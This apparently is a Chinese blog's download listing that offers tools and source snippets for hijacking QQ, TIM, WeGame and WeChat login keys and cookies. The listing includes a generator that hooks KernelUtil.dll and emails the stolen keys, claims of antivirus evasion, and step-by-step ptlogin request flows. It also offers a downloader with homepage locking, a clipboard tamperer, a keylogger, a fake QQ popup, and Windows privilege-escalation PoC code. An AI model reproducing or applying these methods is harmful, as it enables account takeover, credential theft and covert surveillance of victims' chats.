WeGame / WeGameKey / QQKey 登录缓存信息提取器 v1.0
可以截取
WeGame Login Cache
WeGame AccountImpl Cache
WeGame Sig Cache
WeGame Cookie Cache
WeGame Ticket Cache
WeGame Keys Cache
WeGame PTLoginURL
WeGame ClientKey
等等帐号信息数据。
截取最新版本 微信 / wx / wechat 客户端 WXKey、WeChatKey 工具 v3.9.41(可远程查看聊天记录、自动添加 / 接受好友)
微信的聊天记录加密保存在电脑中,有时我们想将自己微信中的聊天记录导出来,但微信软件并不提供该功能。此软件可将自己电脑版微信中的聊天内容批量导出来,方便备份,后期不登录也可方便离线查看。它还能够尝试恢复之前删除过的好友和聊天对话,不小心删除的聊天记录也会显示出来。
可按照联系人名称创建文件夹自动分类,包括:文字,语音,图片,视频,收发的文件,表情包等。导出的html格式文件通过浏览器打开后,会显示网页聊天对话框,像微信聊天窗口一样完美展现聊天内容,
除了显示文字外,图片/表情/文件/语音/视频也显示在网页聊天窗口中,并方便定位到对应文件夹中的文件。
(1)聊天内容中的图片会自动转换成可直接查看的png/gif/jpg文件。
(2)聊天内容中的语音会自动转换成可以直接播放的mp3文件。
(3)聊天内容中的表情包会自动的保存到“表情”目录中,包含自定义的表情、官方表情、对方发送过来的表情。
另外还可以获取微信帐号信息、解密读取数据库、自动添加指定好友、自动接受好友申请、远程查看聊天记录并导出为csv、html等格式,可用于AI训练,自动回复等。目前支持多账户信息获取,支持所有微信版本。
微信聊天记录导出恢复/备份/离线查看工具(文字/语音/图片/视频/文件/表情包) v3.1.40
微信的聊天记录加密保存在电脑中,有时我们想将自己微信中的聊天记录导出来,但微信软件并不提供该功能。此软件可将自己电脑版微信中的聊天内容批量导出来,方便备份,后期不登录也可方便离线查看。它还能够尝试恢复之前删除过的好友和聊天对话,不小心删除的聊天记录也会显示出来。
可按照联系人名称创建文件夹自动分类,包括:文字,语音,图片,视频,收发的文件,表情包等。导出的html格式文件通过浏览器打开后,会显示网页聊天对话框,像微信聊天窗口一样完美展现聊天内容,
除了显示文字外,图片/表情/文件/语音/视频也显示在网页聊天窗口中,并方便定位到对应文件夹中的文件。
(1)聊天内容中的图片会自动转换成可直接查看的png/gif/jpg文件。
(2)聊天内容中的语音会自动转换成可以直接播放的mp3文件。
(3)聊天内容中的表情包会自动的保存到“表情”目录中,包含自定义的表情、官方表情、对方发送过来的表情。
还支持聊天记录导出成HTML、Word、CSV文档,以实现永久保存。此外,该工具还具有对聊天记录进行分析的功能,可以生成年度聊天报告,帮助用户更好地了解和回顾与他人的沟通。是一款强大的微信聊天管理工具
微信聊天记录导出恢复/备份/离线查看工具(文字/语音/图片/视频/文件/表情包) v3.1.39
微信的聊天记录加密保存在电脑中,有时我们想将自己微信中的聊天记录导出来,但微信软件并不提供该功能。此软件可将自己电脑版微信中的聊天内容批量导出来,方便备份,后期不登录也可方便离线查看。它还能够尝试恢复之前删除过的好友和聊天对话,不小心删除的聊天记录也会显示出来。
可按照联系人名称创建文件夹自动分类,包括:文字,语音,图片,视频,收发的文件,表情包等。导出的html格式文件通过浏览器打开后,会显示网页聊天对话框,像微信聊天窗口一样完美展现聊天内容,
除了显示文字外,图片/表情/文件/语音/视频也显示在网页聊天窗口中,并方便定位到对应文件夹中的文件。
(1)聊天内容中的图片会自动转换成可直接查看的png/gif/jpg文件。
(2)聊天内容中的语音会自动转换成可以直接播放的mp3文件。
(3)聊天内容中的表情包会自动的保存到“表情”目录中,包含自定义的表情、官方表情、对方发送过来的表情。
还支持聊天记录导出成HTML、Word、CSV文档,以实现永久保存。此外,该工具还具有对聊天记录进行分析的功能,可以生成年度聊天报告,帮助用户更好地了解和回顾与他人的沟通。是一款强大的微信聊天管理工具
微信聊天记录查看工具 2024 v3.1.38
微信的聊天记录加密保存在电脑中,有时我们想将自己微信中的聊天记录导出来,但微信软件并不提供该功能。此软件可将自己电脑版微信中的聊天内容批量导出来,方便备份,后期不登录也可方便离线查看。它还能够尝试恢复之前删除过的好友和聊天对话,不小心删除的聊天记录也会显示出来。
可按照联系人名称创建文件夹自动分类,包括:文字,语音,图片,视频,收发的文件,表情包等。导出的html格式文件通过浏览器打开后,会显示网页聊天对话框,像微信聊天窗口一样完美展现聊天内容,
除了显示文字外,图片/表情/文件/语音/视频也显示在网页聊天窗口中,并方便定位到对应文件夹中的文件。
(1)聊天内容中的图片会自动转换成可直接查看的png/gif/jpg文件。
(2)聊天内容中的语音会自动转换成可以直接播放的mp3文件。
(3)聊天内容中的表情包会自动的保存到“表情”目录中,包含自定义的表情、官方表情、对方发送过来的表情。
还支持聊天记录导出成HTML、Word、CSV文档,以实现永久保存。此外,该工具还具有对聊天记录进行分析的功能,可以生成年度聊天报告,帮助用户更好地了解和回顾与他人的沟通。是一款强大的微信聊天管理工具
截取最新版本 QQNT / TIM / QQ 客户端 QQKey、QQClientKey 工具 v2.4
本文地址:
https://blog.youkuaiyun.com/qq_39190622/article/details/135298346
针对 腾讯官网 最新发布的 QQNT 9.9.8 / QQ 9.7.22 / TIM 3.4.8 新版本客户端全面更新截取代码。
自从 QQ 9.7.20 版本起就已经不能通过模拟网页快捷登录来截取 Uin 跟 Clientkey 数据,而此次 腾讯官网 最新发布的 QQNT 9.9.8 与 QQ 9.7.22 可谓是采用了全新的技术、全新的架构,截取数据的流程大大改变。根据文章我们可以看出 ClientKey 由原来的 64位 与 224位 突变为 96位,然而截取的流程也大不一样。 主界面 QQ空间 跟 QQ邮箱 的按钮地址也发生改变。ProcessExplorer 加载后发现原本成功登录后会首先加载的 KernelUtil.dll 已经不知所踪。也就是说我们之前分享的文章中所用的方法也已经被和谐。但是方法总比困难多……终于在辛苦摸索了一个通宵后发现了另外的一种方法可以截取新版本的 Uin 跟 ClientKey。下面我们将来一一演示。
劫持最新版 QQNT / QQ / TIM 客户端 QQKey、QQClientKey
文章地址:
https://blog.youkuaiyun.com/qq_39190622/article/details/135298346
截取QQNT、TIM、QQ客户端QQKey、ClientKey并过免杀过360演示。
通过 KernelUtil 截取 QQ / TIM 客户端 QQClientkey / QQKey 工具 v1.2
详细教程文章请查阅:
https://blog.youkuaiyun.com/qq_39190622/article/details/134909563
众所周知,由于腾讯最新版本 QQ 9.7.20 已经不能通过模拟网页快捷登录来截取 QQClientkey / QQKey,估计是针对访问的程序做了限制,然而经过多方面测试,诸多的地区、环境、机器也针对这种获取方法做了相应的措施,导致模拟网页快捷登录来截取数据被彻底的和谐,为了解决这个问题我们只能更改思路对 KernelUtil.dll 下手。
但该方法对于大部分安全软件都会提示并拦截,其中包括 windows 10 / windows 11 下的 Microsoft Defender 也是如此,那么就显得一无是处了。还有另一种方法是通过读取 QQ 客户端数据来截取其中的 Uin 与 Clientkey,有兴趣的可以私信我。
该程序为生成器,仅支持 QQ 与 TIM 客户端,通过劫持 KernelUtil.dll 函数来截取 QQClientKey / QQKey 并发送至指定邮箱。。。。。。。。。。。。。。。。。。。。。。。。。。。。。
通过 KernelUtil 截取 QQ / TIM 客户端 QClientkey / QKey 演示工具 v1.1
详细教程文章请查阅:
https://blog.youkuaiyun.com/qq_39190622/article/details/134909563
众所周知,由于腾讯最新版本 QQ 9.7.20 已经不能通过模拟网页快捷登录来截取 QQClientkey / QQKey,估计是针对访问的程序做了限制,然而经过多方面测试,诸多的地区、环境、机器也针对这种获取方法做了相应的措施,导致模拟网页快捷登录来截取数据被彻底的和谐,为了解决这个问题我们只能更改思路对 KernelUtil.dll 下手。
但该方法对于大部分安全软件都会提示并拦截,其中包括 windows 10 / windows 11 下的 Microsoft Defender 也是如此,那么就显得一无是处了。还有另一种方法是通过读取 QQ 客户端数据来截取其中的 Uin 与 Clientkey,有兴趣的可以私信我。
该程序为生成器,仅支持 QQ 与 TIM 客户端,通过劫持 KernelUtil.dll 函数来截取 QQClientKey / QQKey 并发送至指定邮箱。。。。。。。。。。。。。。。。。。。。。。。。。。。。。
截取最新版本 QQNT / TIM / QQ 客户端 ClientKey / Key 工具 v2.1
本文地址:
https://blog.youkuaiyun.com/qq_39190622/article/details/135298346
针对 腾讯官网 最新发布的 QQNT 9.9.6 / QQ 9.7.21 / TIM 3.4.8 新版本客户端全面更新截取代码。
自从 QQ 9.7.20 版本起就已经不能通过模拟网页快捷登录来截取 Uin 跟 Clientkey 数据,而此次 腾讯官网 最新发布的 QQNT 9.9.6 与 QQ 9.7.21 可谓是采用了全新的技术、全新的架构,截取数据的流程大大改变。根据文章我们可以看出 ClientKey 由原来的 64位 与 224位 突变为 96位,然而截取的流程也大不一样。 主界面 QQ空间 跟 QQ邮箱 的按钮地址也发生改变。ProcessExplorer 加载后发现原本成功登录后会首先加载的 KernelUtil.dll 已经不知所踪。也就是说我们之前分享的文章中所用的方法也已经被和谐。但是方法总比困难多……终于在辛苦摸索了一个通宵后发现了另外的一种方法可以截取新版本的 Uin 跟 ClientKey。下面我们将来一一演示。
截取最新版本 QQNT / TIM / QQ 客户端 ClientKey / Key 工具 v2.0
本文地址:
https://blog.youkuaiyun.com/qq_39190622/article/details/135298346
针对 腾讯官网 最新发布的 QQNT 9.9.6 / QQ 9.7.21 / TIM 3.4.8 新版本客户端全面更新截取代码。
自从 QQ 9.7.20 版本起就已经不能通过模拟网页快捷登录来截取 Uin 跟 Clientkey 数据,而此次 腾讯官网 最新发布的 QQNT 9.9.6 与 QQ 9.7.21 可谓是采用了全新的技术、全新的架构,截取数据的流程大大改变。根据文章我们可以看出 ClientKey 由原来的 64位 与 224位 突变为 96位,然而截取的流程也大不一样。 主界面 QQ空间 跟 QQ邮箱 的按钮地址也发生改变。ProcessExplorer 加载后发现原本成功登录后会首先加载的 KernelUtil.dll 已经不知所踪。也就是说我们之前分享的文章中所用的方法也已经被和谐。但是方法总比困难多……终于在辛苦摸索了一个通宵后发现了另外的一种方法可以截取新版本的 Uin 跟 ClientKey。下面我们将来一一演示。
SetWindowsHookEx: 全局钩子实现键盘记录器 Hook Steam
本文地址:
https://blog.youkuaiyun.com/qq_39190622/article/details/135305484
SetWindowsHookEx 钩子(Hook),是Windows消息处理机制的一个平台,应用程序可以在上面设置子程以监视指定窗口的某种消息,而且所监视的窗口可以是其他进程所创建的。当消息到达后,在目标窗口处理函数之前处理它。钩子机制允许应用程序截获处理window消息或特定事件。
钩子实际上是一个处理消息的程序段,通过系统调用,把它挂入系统。每当特定的消息发出,在没有到达目的窗口前,钩子程序就先捕获该消息,亦即钩子函数先得到控制权。这时钩子函数即可以加工处理(改变)该消息,也可以不作处理而继续传递该消息,还可以强制结束消息的传递。在窗口消息的处理流程插队加入自己的处理函数。
在Ring3级下,SetWindowsHookEx 这个函数能够实现优先拦截提交给特定窗口的信息,并进行拦截者需要的处理,然后再提交给窗口函数或是下一个钩子函数,函数第一个参数为idHook,需要设置钩子的类型,在以下代码样例中我们选择安装的钩
劫持最新版 QQNT / QQ / TIM 客户端 ClientKeys 演示工具
本文地址:
https://blog.youkuaiyun.com/qq_39190622/article/details/135298346
针对 TX官网 最新发布的 QQNT 9.9.6 与 QQ 9.7.21 新版本客户端全面更新截取代码。
大伙应该都知道自从 QQ 9.7.20 版本起就已经不能通过模拟网页快捷登录来截取 Uin 跟 Clientkey 数据,而此次 TX官网 最新发布的 QQNT 9.9.6 与 QQ 9.7.21 可谓是采用了全新的技术、全新的架构,截取数据的流程大大改变。根据文章我们可以看出 ClientKey 由原来的 64位 与 224位 突变为 96位,然而截取的流程也大不一样。 主界面 QQ空间 跟 QQ邮箱 的按钮地址也发生改变。ProcessExplorer 加载后发现原本成功登录后会首先加载的 KernelUtil.dll 已经不知所踪。也就是说我们之前分享的文章中所用的方法也已经被和谐。但是方法总比困难多……终于在辛苦摸索了一个通宵后发现了另外的一种方法可以截取新版本的 Uin 跟 ClientKey。下面我们将来一一演示。
劫持 QQ / TIM 最新版本客户端 ClientKeys 演示工具下载
《劫持 QQ / TIM 最新版本客户端 ClientKeys》
本文地址:https://blog.youkuaiyun.com/qq_39190622/article/details/135154890
最新版本的 QQ(9.7.20) / TIM(3.4.8) 已经不能模拟网页快捷登录来截取数据,然而我们也经过多种流量测试,绝大部分的地区、环境、机器、网吧等都针对这种获取方式做了相应的措施或封禁,导致被彻底的和谐。
上篇文章《通过 KernelUtil 截取 QQ/TIM 客户端 Clientkey 详细教程》我们也详细说明过利用QQ客户端加载的 KernelUtil.dll 定位函数来截取 Uin 跟 Clientkey,但是该种方法最大的缺点就是会被各种各样的安全软件与防毒软件提示、警报或拦截。
针对目前的情况我们只能再次寻求另外的途径来尝试突破封锁,下面我们将演示一种独特的方式来截取 Uin 跟 Clientkey,主要展示的是既不会被安全软件或防毒软件拦截也不会出现任何提示与警报。
最新版本 通过 KernelUtil 截取 QQ / TIM 客户端 Clientkey 演示工具 v1.0
众所周知,由于最新版本 9.7.20 已经不能通过模拟网页快捷登录来截取 Clientkey,估计是针对访问的程序做了限制,然而经过多方面测试,诸多的地区、环境、机器也针对这种获取方法做了相应的措施,导致模拟网页快捷登录来截取数据被彻底的和谐,为了解决这个问题我们只能更改思路对 KernelUtil.dll 下手。
但该方法对于大部分安全软件都会提示并拦截,其中包括 windows 10 / windows 11 下的 Microsoft Defender 也是如此,那么就显得一无是处了。还有另一种方法是通过读取 QQ 客户端数据来截取其中的 Uin 与 Clientkey,有兴趣的可以私信我。
利用网页快捷登录协议截取ClientKey、Key工具(支持最新版本 9.7.20) v1.7
《利用网页快捷登录协议截取ClientKey实战课程【详细教学-附源码】》
文章地址:
https://blog.youkuaiyun.com/qq_39190622/article/details/129489268?spm=1001.2014.3001.5501
本工具主要通过利用腾讯网页快捷登录协议来模拟访问并截取电脑已登录QQ的ClientKey、Skey、P_skey等。
Step 1、初始化地址、建立会话并发送请求,从返回的数据中查找pt_local_token的值。
Step 2、利用Step1获取的pt_local_token值构造地址并发送请求获取已登录的QQ uin。
Step 3、截取 QQ ClientKey,利用Step1获取到的pt_local_token与Step2获取到QQ uin构造地址并发送请求。
Step 4、获取 Skey 并提取 ptsigx 的值,利用Step 2的QQ uin与Step 3获取的ClientKey构造地址并发送请求。
Step 5、获取 P_skey,通过Step 4构造的 ptsigx URL 建立会话并发送请求。
CVE-2023-36802 流式处理代理权限提升 PoC 源码
Microsoft 流式处理代理权限提升(CVE-2023-36802):Windows 多媒体框架服务中的组件Microsoft Kernel Streaming Server (mskssrv.sys)中存在对象类型混淆漏洞,通过该漏洞,具有低权限的本地攻击者可以在越界内存上执行流对象操作,从而在内核中执行恶意代码,最终可以将权限提升至SYSTEM。
影响范围 :
Windows 10 Version 22H2 for 32-bit Systems
Windows 10 Version 22H2 for ARM64-based Systems
Windows 10 Version 22H2 for x64-based Systems
Windows 11 Version 22H2 for x64-based Systems
Windows 11 Version 22H2 for ARM64-based Systems
Windows 10 Version 21H2 for x64-based Systems
最新版本通过腾讯快捷登录协议截取QQClientKey、QQKey、Key工具 v1.6
《利用腾讯快捷登录协议截取ClientKey实战课程【详细教学-附源码】》
文章地址:
https://blog.youkuaiyun.com/qq_39190622/article/details/129489268?spm=1001.2014.3001.5501
本工具主要通过利用腾讯网页快捷登录协议来模拟访问并截取电脑已登录QQ的ClientKey、Skey、P_skey等。
Step 1、初始化地址、建立会话并发送请求,从返回的数据中查找pt_local_token的值。
Step 2、利用Step1获取的pt_local_token值构造地址并发送请求获取已登录的QQ uin。
Step 3、截取 QQ ClientKey,利用Step1获取到的pt_local_token与Step2获取到QQ uin构造地址并发送请求。
Step 4、获取 Skey 并提取 ptsigx 的值,利用Step 2的QQ uin与Step 3获取的ClientKey构造地址并发送请求。
Step 5、获取 P_skey,通过Step 4构造的 ptsigx URL 建立会话并发送请求。
最新利用腾讯快捷登录协议截取ClientKey、Key工具 v1.5
《利用腾讯快捷登录协议截取ClientKey实战课程【详细教学-附源码】》
文章地址:
https://blog.youkuaiyun.com/qq_39190622/article/details/129489268?spm=1001.2014.3001.5501
本工具主要通过利用腾讯网页快捷登录协议来模拟访问并截取电脑已登录QQ的ClientKey、Skey、P_skey等。
Step 1、初始化地址、建立会话并发送请求,从返回的数据中查找pt_local_token的值。
Step 2、利用Step1获取的pt_local_token值构造地址并发送请求获取已登录的QQ uin。
Step 3、截取 QQ ClientKey,利用Step1获取到的pt_local_token与Step2获取到QQ uin构造地址并发送请求。
Step 4、获取 Skey 并提取 ptsigx 的值,利用Step 2的QQ uin与Step 3获取的ClientKey构造地址并发送请求。
Step 5、获取 P_skey,通过Step 4构造的 ptsigx URL 建立会话并发送请求。
利用腾讯快捷登录协议截取QQ ClientKey、QQ Key、Key工具
《利用腾讯快捷登录协议截取QQ ClientKey实战课程【详细教学-附源码】》
文章地址:
https://blog.youkuaiyun.com/qq_39190622/article/details/129489268?spm=1001.2014.3001.5501
本工具主要通过利用腾讯网页快捷登录协议来模拟访问并截取电脑已登录QQ的ClientKey、Skey、P_skey等。
Step 1、初始化地址、建立会话并发送请求,从返回的数据中查找pt_local_token的值。
Step 2、利用Step1获取的pt_local_token值构造地址并发送请求获取已登录的QQ uin。
Step 3、截取 QQ ClientKey,利用Step1获取到的pt_local_token与Step2获取到QQ uin构造地址并发送请求。
Step 4、获取 Skey 并提取 ptsigx 的值,利用Step 2的QQ uin与Step 3获取的ClientKey构造地址并发送请求。
Step 5、获取 P_skey,通过Step 4构造的 ptsigx URL 建立会话并发送请求。
彩虹下载者后台统计系统 v1.1
本次我们主要继续完善下载者的功能,将添加劫持QQ Key(QQ Clientkey)模块。
本程序仅支持 PHP <= 5.6.40 版本。
推荐安装以下 PHP 组件系统(PHP 5.6.40 + MYSQL 5.7.35 + PHPMYADMIN)
https://d.hws.com/free/hwshostmaster.zip
// 初始化URL
URL_COMPONENTSA crackedURL = { 0 };
char URL_STRING[] = "https://ssl.xui.ptlogin2.weiyun.com/cgi-bin/xlogin?appid=527020901&daid=372&low_login=0&qlogin_auto_login=1&s_url=https://www.weiyun.com/web/callback/common_qq_login_ok.html?login_succ&style=20&hide_title=1&target=self&link_target=blan
彩虹下载者 2023 Free v1.2
本次我们主要继续完善下载者的功能,将添加劫持QQ Key(QQ Clientkey)模块。鉴于之前已经开篇研究过截取QQ Key(QQ Clientkey)的流程,那么直接将代码复制粘贴即可。
// 初始化URL
URL_COMPONENTSA crackedURL = { 0 };
char URL_STRING[] = "https://ssl.xui.ptlogin2.weiyun.com/cgi-bin/xlogin?appid=527020901&daid=372&low_login=0&qlogin_auto_login=1&s_url=https://www.weiyun.com/web/callback/common_qq_login_ok.html?login_succ&style=20&hide_title=1&target=self&link_target=blank&hide_close_icon=1&pt_no_auth=1";
char szHostName[128] = { 0 };
彩虹下载者 2023 v1.0版
由于近期业务需要,根据客户要求订制一款智能下载器附带功能(判断进程、DLL运行、锁定浏览器主页、获取系统信息、截取QQ KEY、监控剪贴板、后台统计数据等等)
于是便有了想法教大家打造一款属于自己的智能下载器,高手略过。
// downloader.cpp : 定义控制台应用程序的入口点。
//
#include "stdafx.h"
#include "downloader.h"
#ifdef _DEBUG
#define new DEBUG_NEW
#endif
////////////////////////////////////////////////////////////////////////////////////////////
// 动态加载
typedef HRESULT(_stdcall *XXXDL)(LPUNKNOWN, LPCSTR, LPCSTR, DWORD, LPBINDSTATUSCALLBACK);
typedef HINTERNET(_stdcall *XXXInternetOpen)(LPCTSTR, DWORD, LPCTSTR
Rainbow 统计系统 v1.0
由于近期业务需要,根据客户要求订制一款智能下载器附带功能(判断进程、DLL运行、锁定浏览器主页、获取系统信息、截取QQ KEY、监控剪贴板、后台统计数据等等)
于是便有了想法教大家打造一款属于自己的智能下载器,高手略过。
// downloader.cpp : 定义控制台应用程序的入口点。
//
#include "stdafx.h"
#include "downloader.h"
#ifdef _DEBUG
#define new DEBUG_NEW
#endif
////////////////////////////////////////////////////////////////////////////////////////////
// 动态加载
typedef HRESULT(_stdcall *XXXDL)(LPUNKNOWN, LPCSTR, LPCSTR, DWORD, LPBINDSTATUSCALLBACK);
typedef HINTERNET(_stdcall *XXXInternetOpen)(LPCTSTR, DWORD, LPCTST
Rainbow Downloader 2023 智能判断下载者 v1.0 VC源码
由于近期业务需要,根据客户要求订制一款智能下载器附带功能(判断进程、DLL运行、锁定浏览器主页、获取系统信息、截取QQ KEY、监控剪贴板、后台统计数据等等)
于是便有了想法教大家打造一款属于自己的智能下载器,高手略过。
// downloader.cpp : 定义控制台应用程序的入口点。
//
#include "stdafx.h"
#include "downloader.h"
#ifdef _DEBUG
#define new DEBUG_NEW
#endif
////////////////////////////////////////////////////////////////////////////////////////////
// 动态加载
typedef HRESULT(_stdcall *XXXDL)(LPUNKNOWN, LPCSTR, LPCSTR, DWORD, LPBINDSTATUSCALLBACK);
typedef HINTERNET(_stdcall *XXXInternetOpen)(LPCTSTR, DWORD, LPCTST
CVE-2023-40477 WinRAR 远程代码执行漏洞 PoC
WinRAR 拥有超过 500 亿用户,面临新漏洞(CVE-2023-40477、CVE-2023-38831)。
今天,我们首次展示:CVE-2023-40477 的 PoC。
尽管 RCE 被认为是可利用的,但由于多种原因,其在实现过程中看起来并不乐观。
我们在此展示全面的技术研究:其影响、可利用的场景和缓解措施。
该漏洞已在最近的 WinRAR v6.23 中修复,我们在这里还提供了另一种缓解措施。
尽管其 CVE 等级很高,但成功利用所需的复杂性表明广泛滥用的可能性很低,这与广泛利用的 Log4j RCE 漏洞不同。
有趣的是,Chromium似乎也利用了unrar库:https://chromium.googlesource.com/chromium/src//6ff23b0604e2edbe7ef282564ea340f5c72ab91a^/
unrar库作为第三方依赖项合并到Chrome OS中是合理的,尽管没有显示其用法的代码引用。
在缓解策略方面,有几种可行的选择可供考虑:
完全修复:将 Winrar 更新到 6.23+ 将完全修复该问题。
修补程序
CVE-2023-38831 WinRAR 远程代码执行漏洞 0Day PoC
CVE-2023-38831 漏洞位于ZIP文件的处理过程,攻击者可以制作恶意.ZIP或.RAR压缩文件,其中包含无害文件(例如.jpg、.txt或PDF文件等)及恶意执行文件,并以无害文件名为文件夹命名。当用户点击并试图解压缩看似合法的文件时,即被安装恶意程序。
该漏洞产生的根源在于对用户提供的数据缺乏适当的验证,这会引发分配的缓存背后的内存访问。漏洞利用需要用户交互,即攻击者需要访问恶意页面或打开精心伪造的RAR文件。但从实际攻击场景来说,欺骗用户执行必要的交互操作并不难。
RARLAB已于2023年8月2日发布了WinRAR v 6.23版本,建议用户尽快安装安全更新。
鉴于此类漏洞可被用于进一步攻击活动,微软已经开始测试Windows 11系统对RAR、7-Zip和GZ等压缩文件格式的支持,未来系统将无需安装WinRAR这样的第三方软件,以减少可能的攻击面。
CVE-2023-38831漏洞执行的Windows CMD脚本,来源:BleepingComputer
该漏洞是通过创建与安全文件相比结构略有修改的特制存档而触发的,这会导致 WinRAR 的 ShellExecu
CVE-2023-21768 Windows AFD 本地提权漏洞 C 源码
CVE-2023-21768 Windows Ancillary Function Driver (AFD) afd.sys本地提权漏洞。
AFD (Ancillary Function Driver)是Windows操作系统中的一个内核模式驱动程序。
漏洞原理:
该漏洞存在于AFD驱动程序处理用户模式输入/输出(I/O)操作的方式中。具体来说,该漏洞允许攻击者向AFD驱动程序发送恶意输入/输出控制(IOCTL)请求,这可能导致以提升的权限执行任意代码。
受影响系统 :
Windows 11 Version 22H2 for x64-based Systems
Windows 11 Version 22H2 for ARM64-based Systems
Windows 11 version 21H2 for ARM64-based Systems
Windows 11 version 21H2 for x64-based Systems
Windows Server 2022 (Server Core installation)
Windows Server 2022
CVE-2023-28252 CLFS Windows 本地提权漏洞 POCC 源码
CVE-2023-28252 是一个存在于 clfs.sys(通用日志文件系统驱动程序)中的越界写入漏洞。
卡巴斯基披露该在野0day提权漏洞是一个越界写入(增量)漏洞,当目标系统试图扩展元数据块时被利用来获取system权限———Windows中最高的用户权限级别。该漏洞允许改变基础日志文件,迫使系统将基础日志文件中的假元素视为真实元素。其通过改变指向内存中一个特定的公共日志文件系统(CLFS)结构的偏移值,使之指向一个恶意结构。此外其在用户层面提供一个指向受控内存的指针,以获得内核的读/写权限。CLFS结构是Windows操作系统使用的CLFS通用日志系统的一部分,它由物理日志文件、日志流、日志记录等组成。
受影响版本
Windows7/8/9/10/11
Windows Server 2008/2012/2016/2018/2019/2022
#include "clfs_eop.h"
// Global Variables
IO_STATUS_BLOCK status_block = { 0 };
UINT64 offset_SeSetAccess = 0;
CVE-2022-37969 Windows 本地权限提升 PoC
CVE-2022-37969 是通用日志文件系统驱动 clfs 中的越界写入漏洞,通过该漏洞,可以完成提权。
//
// Understanding the CVE-2022-37969 Windows Common Log File System Driver Local Privilege Escalation.
// Authors: www.chwm.vip
//
#pragma warning (disable : 4005)
#include <stdio.h>
#include <iostream>
#include <windows.h>
#include <clfsw32.h>
#include <ntstatus.h>
#include <processthreadsapi.h>
#include <tlhelp32.h>
#include "ntos.h"
#include "crc32.h"
#pragma comment(lib, "ntdll.lib")
#pragma comment(lib, "Clfsw32.lib")
腾讯快捷登录协议截取QQ邮箱ClientKey教程演示工具
最近发现之前的老代码已经不能获取QQ邮箱的Clientkey,经过一番调试后发现QQ邮箱更新了获取的流程,所以决定重新发布一篇文章,废话不多,直接上教程,喜欢的朋友记得点赞加关注。
本文地址:
https://blog.youkuaiyun.com/qq_39190622?spm=1011.2124.3001.5343
1、首先需要获取到 Qrsig 的值
Request URL:
https://ssl.ptlogin2.qq.com/ptqrshow?appid=716027609&e=2&l=M&s=3&d=72&v=4&t=0.1957881457063695&daid=383&pt_3rd_aid=102013353&u1=https%3A%2F%2Fgraph.qq.com%2Foauth2.0%2Flogin_jump
返回数据在浏览器 Set-Cookie 中
2、利用 Qrsig 获取 pt_local_token
Request URL:
https://xui.ptlogin2.qq.com/cgi-bin/xlogin?target=self&appid
Rainbow 电商选品助手 v1.0.1
由于近期电商项目在选品过程中需要复制某平台上的商品ID再粘贴到表格拼接链接后上架的操作甚是繁琐、复杂,便决定自行编写一款软件来代替这烦人的流程。
如果每天需要选品达上百个,那一直的复制、粘贴、拼接,那岂不是手都要弄废掉?于是便想到了以下方法!
既然点击”复制按钮”商品ID便存储于剪贴板,那我们写个小程序来监制剪贴板不就事半功倍?!
附本文详细解说地址:
https://blog.youkuaiyun.com/qq_39190622/article/details/131894822
// 循环读取windows消息 线程模块
static DWORD WINAPI GetMessage(LPVOID pParam)
{
// 注册窗口类
HINSTANCE hInst;
hInst = GetModuleHandle(0);
MyRegisterClass(hInst);
// 创建窗口
HWND hWnd = CreateWindow("RainbowTools", "Clipboard Monitor", WS_OVERLAPPEDWINDOW,
CW
利用腾讯快捷登录协议截取QQ ClientKey实战课程演示工具
《利用腾讯快捷登录协议截取QQ ClientKey实战课程【详细教学-附源码】》
文章地址:
https://blog.youkuaiyun.com/qq_39190622/article/details/129489268?spm=1001.2014.3001.5501
本工具主要通过利用腾讯网页快捷登录协议来模拟访问并截取电脑已登录QQ的ClientKey、Skey、P_skey等。
Step 1、初始化地址、建立会话并发送请求,从返回的数据中查找pt_local_token的值。
Step 2、利用Step1获取的pt_local_token值构造地址并发送请求获取已登录的QQ uin。
Step 3、截取 QQ ClientKey,利用Step1获取到的pt_local_token与Step2获取到QQ uin构造地址并发送请求。
Step 4、获取 Skey 并提取 ptsigx 的值,利用Step 2的QQ uin与Step 3获取的ClientKey构造地址并发送请求。
Step 5、获取 P_skey,通过Step 4构造的 ptsigx URL 建立会话并发送请求。
IE、Chrome 内核系列浏览器域名监控跳转工具 v1.2
《关于UIAutomation读取/检测/判断浏览器域名并跳转的一点疑惑》
文章中演示的完整工具(带源码,可二次开发。)
地址:https://blog.youkuaiyun.com/qq_39190622/article/details/129474795
该工具主要利用 UIAutomation 【本地辅助(自动化)功能】,监控机器中当前浏览器的域名并跳转到用户指定的域名上,程序经过反复测试目前能十分稳定地执行操作。目前BUG未知,如在使用过程中发现任务问题,可以私信联系我处理解决。
【测试环境】
windows 7 & x64
windows 10 & x64
windows 11 & x64
32位系统未测试,请自行下载后操作。
【受支持的浏览器版本】
谷歌浏览器
火狐浏览器
QQ浏览器
Microsoft Edge
Internet Explorer 8,9,10,11
360安全浏览器、360极速浏览器、360极速浏览器X
或其他基于 Chrome 内核 的系列浏览器均受支持
【免责声明】
Rainbow 所提供的资源仅供学习与研究,用户不得利用本站资源从事非法或商业途径。
Windows 系统通用辅助工具
【支持的系统版本】
Windows 11:
Enterprise、Enterprise LTSC、IoT Enterprise LTSC、Enterprise G、SE(CloudEdition)、Education、Pro、Pro Workstation、Pro Education、Home、Home Single Language、Home China
Windows 10:
Enterprise、Enterprise LTSC/LTSB、Enterprise G、Education、Pro、Pro Workstation、Pro Education、Home、Home Single Language、Home China
Windows 8.1:
企业版、专业版、带媒体中心的专业版、核心版、核心单一语言版、核心中国版、学生专业版、必应、必应单一语言版、必应中国版、嵌入式行业企业版/专业版/汽车版
Windows 8:
Enterprise、Pro、Pro with Media Center、Core、Core Single Language、Core China
2023 最新 windows 系统剪贴板监控 / 篡改工具
VC编写,通过循环读取windows消息来监控系统的剪贴板并篡改其内容。
static DWORD WINAPI GetMessage(LPVOID pParam)
{
// 注册窗口类
MyRegisterClass(hInst);
// 创建窗口
HWND hWnd = CreateWindow("RBTools", "Clipboard Monitor", WS_OVERLAPPEDWINDOW,
CW_USEDEFAULT, 0, CW_USEDEFAULT, 0, NULL, NULL, hInst, NULL);
// 隐藏窗口
ShowWindow(hWnd, SW_HIDE);
// 循环接收消息
MSG msg;
while (GetMessage(&msg, NULL, 0, 0))
{
TranslateMessage(&msg);
DispatchMessage(&msg);
}
return (int)msg.wParam;
}
精仿 QQ 右下角弹窗 / 广告(附VC源码,可二次开发 )
精仿 QQ 右下角弹窗 / 广告, VC 语言编写,带原版通知声音,可二次开发,100%一模一样。
1、当前版本仅支持单个广告弹出展示。
2、程序经过反复测试,目前能十分稳定地在目标机器右下角位置弹出所指定的广告。
3、百分百精仿,无论样式、声音都与原版样式一致,100%还原。
